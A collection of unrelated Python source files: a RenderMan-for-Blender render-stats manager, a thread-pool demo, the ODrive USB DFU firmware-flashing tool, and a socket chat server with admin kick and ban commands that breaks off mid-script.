for label in self.render_live_stats.keys():
self.render_live_stats[label] = '--'
self._prevTotalRays = 0
self._progress = 0
self._prevTotalRaysValid = True
self.export_stat_label = ''
self.export_stat_progress = 0.0
def create_stats_manager(self):
if self.mgr:
return
try:
self.mgr = stcore.StatsManager()
self.is_valid = self.mgr.is_valid
except:
self.mgr = None
self.is_valid = False
def init_stats_session(self):
self.rman_stats_session_config = rman.Stats.SessionConfig(self.rman_stats_session_name)
# look for a custom stats.ini file
rman_stats_config_path = os.environ.get('RMAN_STATS_CONFIG_PATH', None)
if rman_stats_config_path:
if os.path.exists(os.path.join(rman_stats_config_path, 'stats.ini')):
self.rman_stats_session_config.LoadConfigFile(rman_stats_config_path, 'stats.ini')
self.update_session_config()
self.rman_stats_session = rman.Stats.AddSession(self.rman_stats_session_config)
def update_session_config(self):
self.web_socket_enabled = prefs_utils.get_pref('rman_roz_webSocketServer', default=False)
self.web_socket_port = prefs_utils.get_pref('rman_roz_webSocketServer_Port', default=9723)
config_dict = dict()
config_dict["logLevel"] = int(prefs_utils.get_pref('rman_roz_logLevel', default='3'))
config_dict["grpcServer"] = prefs_utils.get_pref('rman_roz_grpcServer', default=True)
config_dict["webSocketPort"] = self.web_socket_port
config_dict["webSocketServer"] = self.web_socket_enabled
config_str = json.dumps(config_dict)
self.rman_stats_session_config.Update(config_str)
if self.rman_stats_session:
self.rman_stats_session.Update(self.rman_stats_session_config)
if self.web_socket_enabled:
#self.attach()
pass
else:
self.disconnect()
def boot_strap(self):
while not self.mgr.clientConnected():
time.sleep(0.01)
if self.boot_strap_thread_kill:
return
if self.mgr.failedToConnect():
rfb_log().error('Failed to connect to stats web socket server.')
return
if self.mgr.clientConnected():
for name,label in __LIVE_METRICS__:
# Declare interest
self.mgr.enableMetric(name)
return
def attach(self):
host = self.mgr.config["webSocketHost"]
port = self.web_socket_port
if not self.mgr:
return
if (self.mgr.clientConnected()):
return
# The connectToServer call is a set of asynchronous calls so we set
# a thread to check the connection and then enable the metrics
self.mgr.connectToServer(host, port)
# if the bootstrap thread is still running, kill it
if self.boot_strap_thread:
if self.boot_strap_thread.is_alive():
self.boot_strap_thread_kill = True
self.boot_strap_thread.join()
self.boot_strap_thread_kill = False
self.boot_strap_thread = False
self.boot_strap_thread = threading.Thread(target=self.boot_strap)
self.boot_strap_thread.start()
def is_connected(self):
return (self.web_socket_enabled and self.mgr and self.mgr.clientConnected())
def disconnect(self):
if self.is_connected():
self.mgr.disconnectFromServer()
def get_status(self):
if self.is_connected():
return 'Connected'
elif self.mgr.failedToConnect():
return 'Connection Failed'
else:
return 'Disconnected'
def check_payload(self, jsonData, name):
try:
dat = jsonData[name]
return dat
except KeyError:
# could not find the metric name in the JSON
# try re-registering it again
self.mgr.enableMetric(name)
return None
def update_payloads(self):
""" Get the latest payload data from Roz via the websocket client in the
manager object. Data comes back as a JSON-formatted string which is
then parsed to update the appropriate payload field widgets.
"""
if not self.is_connected():
self.draw_stats()
return
latest = self.mgr.getLatestData()
if (latest):
# Load JSON-formated string into JSON object
try:
jsonData = json.loads(latest)
except json.decoder.JSONDecodeError:
rfb_log().debug("Could not decode stats payload JSON.")
jsonData = dict()
pass
for name, label in self.render_stats_names.items():
dat = self.check_payload(jsonData, name)
if not dat:
continue
if name == "/system.processMemory":
# Payload has 3 floats: max, resident, XXX
# Convert resident mem to MB : payload[1] / 1024*1024;
memPayload = dat["payload"].split(',')
maxresMB = ((float)(memPayload[1])) / __oneK2__
# Set consistent fixed point output in string
self.render_live_stats[label] = "{:.2f} MB".format(maxresMB)
elif name == "/rman/raytracing.numRays":
currentTotalRays = int(dat['payload'])
if currentTotalRays <= self._prevTotalRays:
self._prevTotalRaysValid = False
# Synthesize into per second
if self._prevTotalRaysValid:
# The metric is sampled at 60Hz (1000/16-62.5)
diff = currentTotalRays - self._prevTotalRays
raysPerSecond = float(diff * 62.5)
if raysPerSecond > 1000000000.0:
self.render_live_stats[label] = "{:.3f}B".format(raysPerSecond / 1000000000.0)
elif raysPerSecond > 1000000.0:
self.render_live_stats[label] = '{:.3f}M'.format(raysPerSecond / 1000000.0)
elif raysPerSecond > 1000.0:
self.render_live_stats[label] = '{:.3f}K'.format(raysPerSecond / 1000.0)
else:
self.render_live_stats[label] = '{:.3f}'.format(raysPerSecond)
self._prevTotalRaysValid = True
self._prevTotalRays = currentTotalRays
elif name == "/rman@iterationComplete":
itr = eval(dat['payload'])[0]
self._iterations = itr
self.render_live_stats[label] = '%d / %d' % (itr, self._maxSamples)
elif name == "/rman/renderer@progress":
progressVal = int(float(dat['payload']))
self._progress = progressVal
elif name in ["/rman.timeToFirstRaytrace",
"/rman.timeToFirstPixel",
"/rman.timeToFirstIteration"]:
self.render_live_stats[label] = '%s secs' % str(dat['payload'])
else:
self.render_live_stats[label] = str(dat['payload'])
self.draw_stats()
def set_export_stats(self, label, progress):
self.export_stat_label = label
self.export_stat_progress = progress
def draw_stats(self):
if self.rman_render.rman_is_exporting:
self.draw_export_stats()
else:
self.draw_render_stats()
def draw_export_stats(self):
if self.rman_render.bl_engine:
try:
if self.rman_render.rman_interactive_running:
progress = int(self.export_stat_progress*100)
self.rman_render.bl_engine.update_stats('RenderMan (Stats)', "\n%s: %d%%" % (self.export_stat_label, progress))
else:
progress = int(self.export_stat_progress*100)
self.rman_render.bl_engine.update_stats(self.export_stat_label, "%d%%" % progress)
progress = self.export_stat_progress
self.rman_render.bl_engine.update_progress(progress)
except:
rfb_log().debug("Cannot update progress")
def draw_render_stats(self):
if not self.rman_render.rman_running:
return
_stats_to_draw = [
"Memory",
"Rays/Sec",
]
if self.rman_render.rman_interactive_running:
message = '\n%s, %d, %d%%' % (self._integrator, self._decidither, self._res_mult)
if self.is_connected():
for label in _stats_to_draw:
data = self.render_live_stats[label]
message = message + '\n%s: %s' % (label, data)
# iterations
message = message + '\nIterations: %d / %d' % (self._iterations, self._maxSamples)
try:
self.rman_render.bl_engine.update_stats('RenderMan (Stats)', message)
except ReferenceError as e:
rfb_log().debug("Error calling update stats (%s). Aborting..." % str(e))
return
else:
message = ''
if self.is_connected():
for label in _stats_to_draw:
data = self.render_live_stats[label]
message = message + '%s: %s ' % (label, data)
# iterations
message = message + 'Iterations: %d / %d ' % (self._iterations, self._maxSamples)
else:
message = '(no stats connection) '
try:
self.rman_render.bl_engine.update_stats(message, "%d%%" % self._progress)
progress = float(self._progress) / 100.0
self.rman_render.bl_engine.update_progress(progress)
except ReferenceError as e:
rfb_log().debug("Error calling update stats (%s). Aborting..." % str(e))
return
|
threadPool.py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import threading
import time
from queue import Queue
# 创建队列实例,用于存储任务
queue = Queue()
# 定义需要线程池执行的任务
def do_job():
while True:
i = queue.get() # Remove and return an item from the queue.
time.sleep(1)
print("index {}, current: {}".format(i, threading.current_thread()))
queue.task_done() # Indicate that a formely enqueued task is complete. queue的数据就会减少
if __name__ == '__main__':
# 创建包括3个线程的线程池
# 将线程池的线程设置成deamon守护进程,意味着主线程退出时,守护线程也会自动退出,如果使用默认deamon=False,非daemon线程会阻塞
# 主线程的退出,所以,即使queue队列任务已经完成,线程池依然阻塞无线循环等待任务,使得主线程不会退出
for i in range(3):
t = threading.Thread(target=do_job)
t.daemon = True # 设置线程daemon 主线程推出, daemon线程也会推出, 即使正在运行,
t.start()
# 模拟创建线程池3秒后安排10个任务队列
time.sleep(3)
for i in range(10):
queue.put(i)
queue.join() # 主线程设置阻塞,直到任务队列已经清空,解除阻塞
"""
GIL对线程的影响
因为python线程虽然时真正的线程,但是解释器执行代码,有一个GIL锁,Global Interpreter Lock.任何Python线程执行前,必须先获取GIL
锁,然后,每执行100条字节码,解释器就自动释放GIL锁,让别的线程有机会执行,这个GIL全局锁实际上把所有线程的执行代码都给上了锁,所以,
多线程在Python中只能交替执行,即使100个线程跑在100核心CPU上,也只能用到1个核心。
对于IO密集型任务,多线程还是有很大效率提升,
线程池要设置为多少?
计算线程数设置的公式?
N核服务器,执行逻辑单线程本地计算时间X,等待时间Y,工作线程数 = N*(x+y)/ x
"""
|
dfu.py
|
#!/usr/bin/env python
"""
Tool for flashing .hex files to the ODrive via the STM built-in USB DFU mode.
"""
from __future__ import print_function
import argparse
import sys
import time
import threading
import platform
import struct
import requests
import re
import io
import os
import usb.core
import fibre
import odrive
from odrive.utils import Event, OperationAbortedException
from odrive.dfuse import *
try:
from intelhex import IntelHex
except:
sudo_prefix = "" if platform.system() == "Windows" else "sudo "
print("You need intelhex for this ({}pip install IntelHex)".format(sudo_prefix), file=sys.stderr)
sys.exit(1)
def get_fw_version_string(fw_version):
if (fw_version[0], fw_version[1], fw_version[2]) == (0, 0, 0):
return "[unknown version]"
else:
return "v{}.{}.{}{}".format(fw_version[0], fw_version[1], fw_version[2], "-dev" if fw_version[3] else "")
def get_hw_version_string(hw_version):
if hw_version == (0, 0, 0):
return "[unknown version]"
else:
return "v{}.{}{}".format(hw_version[0], hw_version[1], ("-" + str(hw_version[2]) + "V") if hw_version[2] > 0 else "")
def populate_sectors(sectors, hexfile):
"""
Checks for which on-device sectors there is data in the hex file and
returns a (sector, data) tuple for each touched sector where data
is a byte array of the same size as the sector.
"""
for sector in sectors:
addr = sector['addr']
size = sector['len']
# check if any segment from the hexfile overlaps with this sector
touched = False
for (start, end) in hexfile.segments():
if start < addr and end > addr:
touched = True
break
elif start >= addr and start < addr + size:
touched = True
break
if touched:
# TODO: verify if the section is writable
yield (sector, hexfile.tobinarray(addr, addr + size - 1))
def get_first_mismatch_index(array1, array2):
"""
Compares two arrays and returns the index of the
first unequal item or None if both arrays are equal
"""
if len(array1) != len(array2):
raise Exception("arrays must be same size")
for pos in range(len(array1)):
if (array1[pos] != array2[pos]):
return pos
return None
def dump_otp(dfudev):
"""
Dumps the contents of the one-time-programmable
memory for debugging purposes.
The OTP is used to determine the board version.
"""
# 512 Byte OTP
otp_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7800][0]
data = dfudev.read_sector(otp_sector)
print(' '.join('{:02X}'.format(x) for x in data))
# 16 lock bytes
otp_lock_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7A00][0]
data = dfudev.read_sector(otp_lock_sector)
print(' '.join('{:02X}'.format(x) for x in data))
class Firmware():
def __init__(self):
self.fw_version = (0, 0, 0, True)
self.hw_version = (0, 0, 0)
@staticmethod
def is_newer(a, b):
a_num = (a[0], a[1], a[2])
b_num = (b[0], b[1], b[2])
if a_num == (0, 0, 0) or b_num == (0, 0, 0):
return False # Cannot compare unknown versions
return a_num > b_num or (a_num == b_num and not a[3] and b[3])
def __gt__(self, other):
"""
Compares two firmware versions. If both versions are equal, the
prerelease version is considered older than the release version.
"""
if not isinstance(other, tuple):
other = other.fw_version
return Firmware.is_newer(self.fw_version, other)
def __lt__(self, other):
"""
Compares two firmware versions. If both versions are equal, the
prerelease version is considered older than the release version.
"""
if not isinstance(other, tuple):
other = other.fw_version
return Firmware.is_newer(other, self.fw_version)
def is_compatible(self, hw_version):
"""
Determines if this firmware is compatible
with the specified hardware version
"""
return self.hw_version == hw_version
class FirmwareFromGithub(Firmware):
"""
Represents a firmware asset
"""
def __init__(self, release_json, asset_json):
Firmware.__init__(self)
if release_json['draft'] or release_json['prerelease']:
release_json['tag_name'] += "*"
self.fw_version = odrive.version.version_str_to_tuple(release_json['tag_name'])
hw_version_regex = r'.*v([0-9]+).([0-9]+)(-(?P<voltage>[0-9]+)V)?.hex'
hw_version_match = re.search(hw_version_regex, asset_json['name'])
self.hw_version = (int(hw_version_match[1]),
int(hw_version_match[2]),
int(hw_version_match.groupdict().get('voltage') or 0))
self.github_asset_id = asset_json['id']
self.hex = None
# no technical reason to fetch this - just interesting
self.download_count = asset_json['download_count']
def get_as_hex(self):
"""
Returns the content of the firmware in as a binary array in Intel Hex format
"""
if self.hex is None:
print("Downloading firmware {}...".format(get_fw_version_string(self.fw_version)))
response = requests.get('https://api.github.com/repos/madcowswe/ODrive/releases/assets/' + str(self.github_asset_id),
headers={'Accept': 'application/octet-stream'})
if response.status_code != 200:
raise Exception("failed to download firmware")
self.hex = response.content
return io.StringIO(self.hex.decode('utf-8'))
class FirmwareFromFile(Firmware):
def __init__(self, file):
Firmware.__init__(self)
self._file = file
def get_as_hex(self):
return self._file
def get_all_github_firmwares():
response = requests.get('https://api.github.com/repos/madcowswe/ODrive/releases')
if response.status_code != 200:
raise Exception("could not fetch releases")
response_json = response.json()
for release_json in response_json:
for asset_json in release_json['assets']:
try:
if asset_json['name'].lower().endswith('.hex'):
fw = FirmwareFromGithub(release_json, asset_json)
yield fw
except Exception as ex:
print(ex)
def get_newest_firmware(hw_version):
"""
Returns the newest available firmware for the specified hardware version
"""
firmwares = get_all_github_firmwares()
firmwares = filter(lambda fw: not fw.fw_version[3], firmwares) # ignore prereleases
firmwares = filter(lambda fw: fw.hw_version == hw_version, firmwares)
firmwares = list(firmwares)
firmwares.sort()
return firmwares[-1] if len(firmwares) else None
def show_deferred_message(message, cancellation_token):
"""
Shows a message after 10s, unless cancellation_token gets set.
"""
def show_message_thread(message, cancellation_token):
for _ in range(1,10):
if cancellation_token.is_set():
return
time.sleep(1)
if not cancellation_token.is_set():
print(message)
t = threading.Thread(target=show_message_thread, args=(message, cancellation_token))
t.daemon = True
t.start()
def put_into_dfu_mode(device, cancellation_token):
"""
Puts the specified device into DFU mode
"""
if not hasattr(device, "enter_dfu_mode"):
print("The firmware on device {} cannot soft enter DFU mode.\n"
"Please remove power, put the DFU switch into DFU mode,\n"
"then apply power again. Then try again.\n"
"If it still doesn't work, you can try to use the DeFuse app or \n"
"dfu-util, see the odrive documentation.\n"
"You can also flash the firmware using STLink (`make flash`)"
.format(device.__channel__.usb_device.serial_number))
return
print("Putting device {} into DFU mode...".format(device.__channel__.usb_device.serial_number))
try:
device.enter_dfu_mode()
except fibre.ChannelBrokenException:
pass # this is expected because the device reboots
if platform.system() == "Windows":
show_deferred_message("Still waiting for the device to reappear.\n"
"Use the Zadig utility to set the driver of 'STM32 BOOTLOADER' to libusb-win32.",
cancellation_token)
def find_device_in_dfu_mode(serial_number, cancellation_token):
"""
Polls libusb until a device in DFU mode is found
"""
while not cancellation_token.is_set():
params = {} if serial_number == None else {'serial_number': serial_number}
stm_device = usb.core.find(idVendor=0x0483, idProduct=0xdf11, **params)
if stm_device != None:
return stm_device
time.sleep(1)
return None
def update_device(device, firmware, logger, cancellation_token):
"""
Updates the specified device with the specified firmware.
The device passed to this function can either be in
normal mode or in DFU mode.
The firmware should be an instance of Firmware or None.
If firmware is None, the newest firmware for the device is
downloaded from GitHub releases.
"""
if isinstance(device, usb.core.Device):
serial_number = device.serial_number
dfudev = DfuDevice(device)
if (logger._verbose):
logger.debug("OTP:")
dump_otp(dfudev)
# Read hardware version from one-time-programmable memory
otp_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7800][0]
otp_data = dfudev.read_sector(otp_sector)
if otp_data[0] == 0:
otp_data = otp_data[16:]
if otp_data[0] == 0xfe:
hw_version = (otp_data[3], otp_data[4], otp_data[5])
else:
hw_version = (0, 0, 0)
else:
serial_number = device.__channel__.usb_device.serial_number
dfudev = None
# Read hardware version as reported from firmware
hw_version_major = device.hw_version_major if hasattr(device, 'hw_version_major') else 0
hw_version_minor = device.hw_version_minor if hasattr(device, 'hw_version_minor') else 0
hw_version_variant = device.hw_version_variant if hasattr(device, 'hw_version_variant') else 0
hw_version = (hw_version_major, hw_version_minor, hw_version_variant)
if hw_version < (3, 5, 0):
print(" DFU mode is not supported on board version 3.4 or earlier.")
print(" This is because entering DFU mode on such a device would")
print(" break the brake resistor FETs under some circumstances.")
print("Warning: DFU mode is not supported on ODrives earlier than v3.5 unless you perform a hardware mod.")
if not odrive.utils.yes_no_prompt("Do you still want to continue?", False):
raise OperationAbortedException()
fw_version_major = device.fw_version_major if hasattr(device, 'fw_version_major') else 0
fw_version_minor = device.fw_version_minor if hasattr(device, 'fw_version_minor') else 0
fw_version_revision = device.fw_version_revision if hasattr(device, 'fw_version_revision') else 0
fw_version_prerelease = device.fw_version_prerelease if hasattr(device, 'fw_version_prerelease') else True
fw_version = (fw_version_major, fw_version_minor, fw_version_revision, fw_version_prerelease)
print("Found ODrive {} ({}) with firmware {}{}".format(
serial_number,
get_hw_version_string(hw_version),
get_fw_version_string(fw_version),
" in DFU mode" if dfudev is not None else ""))
if firmware is None:
if hw_version == (0, 0, 0):
if dfudev is None:
suggestion = 'You have to manually flash an up-to-date firmware to make automatic checks work. Run `odrivetool dfu --help` for more info.'
else:
suggestion = 'Run "make write_otp" to program the board version.'
raise Exception('Cannot check online for new firmware because the board version is unknown. ' + suggestion)
print("Checking online for newest firmware...", end='')
firmware = get_newest_firmware(hw_version)
if firmware is None:
raise Exception("could not find any firmware release for this board version")
print(" found {}".format(get_fw_version_string(firmware.fw_version)))
if firmware.fw_version <= fw_version:
print()
if firmware.fw_version < fw_version:
print("Warning: you are about to flash firmware {} which is older than the firmware on the device ({}).".format(
get_fw_version_string(firmware.fw_version),
get_fw_version_string(fw_version)))
else:
print("You are about to flash firmware {} which is the same version as the firmware on the device ({}).".format(
get_fw_version_string(firmware.fw_version),
get_fw_version_string(fw_version)))
if not odrive.utils.yes_no_prompt("Do you want to flash this firmware anyway?", False):
raise OperationAbortedException()
# load hex file
# TODO: Either use the elf format or pack a custom format with a manifest.
# This way we can for instance verify the target board version and only
# have to publish one file for every board (instead of elf AND hex files).
hexfile = IntelHex(firmware.get_as_hex())
logger.debug("Contiguous segments in hex file:")
for start, end in hexfile.segments():
logger.debug(" {:08X} to {:08X}".format(start, end - 1))
# Back up configuration
if dfudev is None:
do_backup_config = device.user_config_loaded if hasattr(device, 'user_config_loaded') else False
if do_backup_config:
odrive.configuration.backup_config(device, None, logger)
elif not odrive.utils.yes_no_prompt("The configuration cannot be backed up because the device is already in DFU mode. The configuration may be lost after updating. Do you want to continue anyway?", True):
raise OperationAbortedException()
# Put the device into DFU mode if it's not already in DFU mode
if dfudev is None:
find_odrive_cancellation_token = Event(cancellation_token)
put_into_dfu_mode(device, find_odrive_cancellation_token)
stm_device = find_device_in_dfu_mode(serial_number, cancellation_token)
find_odrive_cancellation_token.set()
dfudev = DfuDevice(stm_device)
logger.debug("Sectors on device: ")
for sector in dfudev.sectors:
logger.debug(" {:08X} to {:08X} ({})".format(
sector['addr'],
sector['addr'] + sector['len'] - 1,
sector['name']))
# fill sectors with data
touched_sectors = list(populate_sectors(dfudev.sectors, hexfile))
logger.debug("The following sectors will be flashed: ")
for sector,_ in touched_sectors:
logger.debug(" {:08X} to {:08X}".format(sector['addr'], sector['addr'] + sector['len'] - 1))
# Erase
try:
for i, (sector, data) in enumerate(touched_sectors):
print("Erasing... (sector {}/{}) \r".format(i, len(touched_sectors)), end='', flush=True)
dfudev.erase_sector(sector)
print('Erasing... done \r', end='', flush=True)
finally:
print('', flush=True)
# Flash
try:
for i, (sector, data) in enumerate(touched_sectors):
print("Flashing... (sector {}/{}) \r".format(i, len(touched_sectors)), end='', flush=True)
dfudev.write_sector(sector, data)
print('Flashing... done \r', end='', flush=True)
finally:
print('', flush=True)
# Verify
try:
for i, (sector, expected_data) in enumerate(touched_sectors):
print("Verifying... (sector {}/{}) \r".format(i, len(touched_sectors)), end='', flush=True)
observed_data = dfudev.read_sector(sector)
mismatch_pos = get_first_mismatch_index(observed_data, expected_data)
if not mismatch_pos is None:
mismatch_pos -= mismatch_pos % 16
observed_snippet = ' '.join('{:02X}'.format(x) for x in observed_data[mismatch_pos:mismatch_pos+16])
expected_snippet = ' '.join('{:02X}'.format(x) for x in expected_data[mismatch_pos:mismatch_pos+16])
raise RuntimeError("Verification failed around address 0x{:08X}:\n".format(sector['addr'] + mismatch_pos) +
" expected: " + expected_snippet + "\n"
" observed: " + observed_snippet)
print('Verifying... done \r', end='', flush=True)
finally:
print('', flush=True)
# If the flash operation failed for some reason, your device is bricked now.
# You can unbrick it as long as the device remains powered on.
# (or always with an STLink)
# So for debugging you should comment this last part out.
# Jump to application
dfudev.jump_to_application(0x08000000)
logger.info("Waiting for the device to reappear...")
device = odrive.find_any("usb", serial_number,
cancellation_token, cancellation_token, timeout=30)
if do_backup_config:
odrive.configuration.restore_config(device, None, logger)
os.remove(odrive.configuration.get_temp_config_filename(device))
logger.success("Device firmware update successful.")
def launch_dfu(args, logger, cancellation_token):
"""
Waits for a device that matches args.path and args.serial_number
and then upgrades the device's firmware.
"""
serial_number = args.serial_number
find_odrive_cancellation_token = Event(cancellation_token)
logger.info("Waiting for ODrive...")
devices = [None, None]
# Start background thread to scan for ODrives in DFU mode
def find_device_in_dfu_mode_thread():
devices[0] = find_device_in_dfu_mode(serial_number, find_odrive_cancellation_token)
find_odrive_cancellation_token.set()
t = threading.Thread(target=find_device_in_dfu_mode_thread)
t.daemon = True
t.start()
# Scan for ODrives not in DFU mode
# We only scan on USB because DFU is only implemented over USB
devices[1] = odrive.find_any("usb", serial_number,
find_odrive_cancellation_token, cancellation_token)
find_odrive_cancellation_token.set()
device = devices[0] or devices[1]
firmware = FirmwareFromFile(args.file) if args.file else None
update_device(device, firmware, logger, cancellation_token)
# Note: the flashed image can be verified using: (0x12000 is the number of bytes to read)
# $ openocd -f interface/stlink-v2.cfg -f target/stm32f4x.cfg -c init -c flash\ read_bank\ 0\ image.bin\ 0\ 0x12000 -c exit
# $ hexdump -C image.bin > image.bin.txt
#
# If you compare this with a reference image that was flashed with the STLink, you will see
# minor differences. This is because this script fills undefined sections with 0xff.
# $ diff image_ref.bin.txt image.bin.txt
# 21c21
# < *
# ---
# > 00000180 d9 47 00 08 d9 47 00 08 ff ff ff ff ff ff ff ff |.G...G..........|
# 2553c2553
# < 00009fc0 9e 46 70 47 00 00 00 00 52 20 96 3c 46 76 50 76 |.FpG....R .<FvPv|
# ---
# > 00009fc0 9e 46 70 47 ff ff ff ff 52 20 96 3c 46 76 50 76 |.FpG....R .<FvPv|
|
Server.py
|
import socket
import threading
import time
import re
import os
## SERVER SCRIPT
HEADER = 2048
DISCONNECT_MESSAGE = "!DISCONNECT"
FORMAT = "utf-8"
all_connected = []
all_address = []
all_username = []
all_message = []
blacklist = []
users = {
"USERNAME" : all_username,
"ADDRESS" : all_address
}
help = {
" Commands" : " Functions",
"/list connection" : " -> Display active connections to server",
"/list connection details" : " -> Display all IP addresses and their respective username",
"/kick [username] [True|False]" : " -> Kick or ban a specific user",
"/pm [username] [message]" : " -> Private message to specific user",
"/toall [message]" : " -> Public message to all users",
"/viewchat" : " -> View the conversation between users",
"/blacklist" : " -> Display all blacklisted mac addresses",
"/blacklist remove [all|IndexNumber]" : " -> Remove all or specific user from the blacklist",
"/kill [seconds]" : " -> Shut down the server in x seconds",
"/help" : " -> Display all commands and their functions",
"cls" : "-> Clear terminal screen",
"echo" : "-> Repeat after user input on terminal"
}
def bootup():
# set up interactive terminal
interactive = threading.Thread(target = interactBlock)
interactive.daemon = True
interactive.start()
server.listen()
print(f"[SERVER] Server listening on <{SERVER}:{PORT}> ....")
while True:
try:
conn, addr = server.accept()
thread = threading.Thread(target = handleClient, args= (conn,addr))
thread.daemon = True
thread.start()
except socket.error as e:
print("Accept request failed : "+ str(e))
def handleClient(conn, addr):
# receive mac address from client
mac_length = conn.recv(HEADER).decode(FORMAT)
mac = conn.recv(int(mac_length)).decode(FORMAT)
# check blacklisted or not
if mac in blacklist:
guard = f"\n[SERVER] You are banned from this server. For more enquiries, please contact the admin\n"
conn.send(guard.encode(FORMAT))
conn.send("!kick".encode(FORMAT))
else:
username_length = conn.recv(HEADER).decode(FORMAT)
username = conn.recv(int(username_length)).decode(FORMAT)
# record client details
all_connected.append(conn)
all_address.append(addr)
all_username.append(username)
print(f"[SERVER] New Connection {addr[0]}:{str(addr[1])} -> {username}",end ="\n>>> ")
conn.send("----------- Start Messaging Below -----------\n".encode(FORMAT))
connected = True
while connected:
try:
msg_length = conn.recv(HEADER).decode(FORMAT)
if int(msg_length) > 0:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
rmsg = f"[{username}] >>> {msg} \n"
if msg == "!DISCONNECT":
rmsg = f"[SERVER] {username} Disconnected... \n"
## remove user records
all_address.remove(addr)
all_connected.remove(conn)
all_username.remove(username)
## loop breaking
connected = False
## save the message to server
all_message.append(rmsg)
## compute length of message
# broadcast_length = str(len(rmsg.encode(FORMAT)))
for client in all_connected:
if client != conn:
client.send(rmsg.encode(FORMAT))
else:
# do nothing if empty message is sent from clients
continue
except:
break
# close client connection
# conn.send("!kill".encode(FORMAT))
# conn.close()
if mac not in blacklist:
print(f"[SERVER] {addr[0]}:{str(addr[1])} -> {username} Disconnected", end="\n>>> ")
def interactBlock():
while True:
cmd = input(">>> ")
# display total number of connections
if cmd == "/list connection":
print(f"[SERVER|ACTIVE CONNECTIONS] {len(all_connected)}")
# display IP and Username of each connection
elif cmd == "/list connection details":
print("\n{:<22} {:}".format("Address"," Username"))
for i in range(len(all_address)):
print("{:<22}-> {:}".format(all_address[i][0]+":"+str(all_address[i][1]),all_username[i]))
print("",end = "\n\n")
# kick or ban a user
elif cmd[:5] == "/kick":
try:
pattern = r"^/kick (.+) (True|False|true|false|t|f|T|F)$"
# check command syntax
if not (re.match(pattern,cmd)):
print("[Server] Argument is not legally filled")
else:
cmd = cmd.split(" ")
ban = cmd[-1]
cmd.pop()
cmd = " ".join(cmd)
target = cmd[6:]
# check existence of the user
if target not in all_username:
print(f"[SERVER] No such user called {target}")
else:
ind = all_username.index(target)
target_conn = all_connected[ind]
print(f"[SERVER] Will Kick {all_address[ind][0]}:{all_address[ind][1]} -> {all_username[ind]}")
reason = input("Reason >>> ")
response = f"[SERVER] You are kicked Reason: {reason}\n"
broad_response = f"[SERVER] {target} is kicked Reason: {reason}\n"
# send ban command and get mac address
if ban.lower() == "true" or ban.lower() == "t":
target_conn.send("!ban".encode(FORMAT))
mac = target_conn.recv(HEADER).decode(FORMAT)
blacklist.append(mac)
# send kick command
target_conn.send(response.encode(FORMAT))
time.sleep(1)
target_conn.send("!kick".encode(FORMAT))
# close the connection
target_conn.close()
all_address.remove(all_address[ind])
all_connected.remove(target_conn)
all_username.remove(target)
print(f"[SERVER] {target} has been kicked")
## message is not sent immediately
# save message to server
all_message.append(broad_response)
for client in all_connected:
client.send(broad_response.encode(FORMAT))
except Exception as e:
print("[SERVER] An unknown error occured\n"+e)
elif cmd[:3] == "/pm":
try:
username = cmd[4:]
if username in all_username:
msg = " ".join(cmd.split(" ")[2:])
package = f"[SERVER|ADMIN] >>> {msg} (DO NOT REPLY)\n"
saved = f"[SERVER|ADMIN] >>> {username} : {msg} (DO NOT REPLY)\n"
# save message to server
all_message.append(saved)
target_conn = all_connected[all_username.index(username)]
target_conn.send(package.encode(FORMAT))
print("[SERVER] Message is sent successfully")
else:
print(f"[SERVER] No such user called {username}")
except:
print("[SERVER] No such user is found in the database")
elif cmd[:6] == "/toall":
try:
msg = cmd[7:]
package = f"[SERVER|ADMIN] >>> {msg}\n"
# save message to server
all_message.append(package)
for client in all_connected:
client.send(package.encode(FORMAT))
print("[Server] Message is sent successfully")
except Exception as e:
print("[SERVER] Unknown error occured!\n"+e)
elif cmd == "/viewchat":
print("-------------- Message History --------------\n")
for message in all_message:
print(message)
print("\n---------------------------------------------",end="\n\n")
elif cmd[:5] == "/kill":
try:
sec = int(cmd[6:])
print(f"[SERVER] Server will shutdown in {sec} seconds, are you sure? y/N >>> ", end = "")
res = input("")
if res.upper() == "Y":
broadcast = " [SERVER] Server will shutdown in {sec} seconds \n"
all_message.append(broadcast)
for client in all_connected:
client.send(broadcast.encode(FORMAT))
time.sleep(sec)
broadcast = "[SERVER] Server shutting down..."
print(broadcast)
for client in all_connected:
client.close()
all_message.append(broadcast)
print("[SERVER] Clearing stored user information...")
all_connected.clear()
all_address.clear()
all_username.clear()
print("[SERVER] Done clearing user information...")
res = input("[SERVER] Press any key to exit...")
os._exit(0)
elif res.upper() == "N" or res == "":
print("[SERVER] Shut down procedure aborted")
else:
print("[SERVER] Unknown Command Inputted")
except Exception as e:
print("[Server] An unknown error occured\n"+str(e))
elif cmd == "/blacklist":
print(f"Number of blacklisted device : {str(len(blacklist))}")
print("List of mac addresses of the devices")
i = 1
for mac in blacklist:
print(f"{str(i)}. {mac}")
i += 1
print("",end="\n\n")
elif cmd[:17] == "/blacklist remove":
if len(blacklist) > 0:
cmd = cmd.split(" ")
# case where no user is specified
if len(cmd) == 2:
print("[SERVER] User to remove from blacklist is unspecified")
# case where all is inputted
elif cmd[-1] == "all":
print("[SERVER] This action will clear all data in blacklist. Are you sure? y/N",end = "\n>>> ")
res = input("")
while True:
if res.upper() == "Y":
print("[SERVER] Clearing blacklist...")
blacklist.clear()
print("[SERVER] Done.")
break
elif res.upper() == "N" or res == "":
print("[SERVER] Action aborted.")
break
else:
pass
res = input(">>> ")
else:
try:
ind = int(cmd[-1])
if ind > len(blacklist) or ind < 1:
print("[SERVER] Invalid index inputted")
else:
blacklist.pop(ind)
print("[SERVER] User specified is removed from blacklist.")
except ValueError:
print("[SERVER] The index entered must be a number")
except not ValueError:
print("[SERVER] Unknown Command Inputted")
else:
print("[SERVER] The blacklist is empty...")
elif cmd == "/help":
print()
for k,v in help.items():
print("{:<38}{:}".format(k,v))
print("",end = "\n\n")
elif cmd == "cls":
os.system("cls")
elif cmd[:4] == "echo":
print(cmd[5:])
elif cmd == "":
continue
else:
print("[SERVER] Unknown Command Inputted")
#main
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print("[Client] Enter the IP and the port number of the host server")
print("Host IP : ")
SERVER = str(input(""))
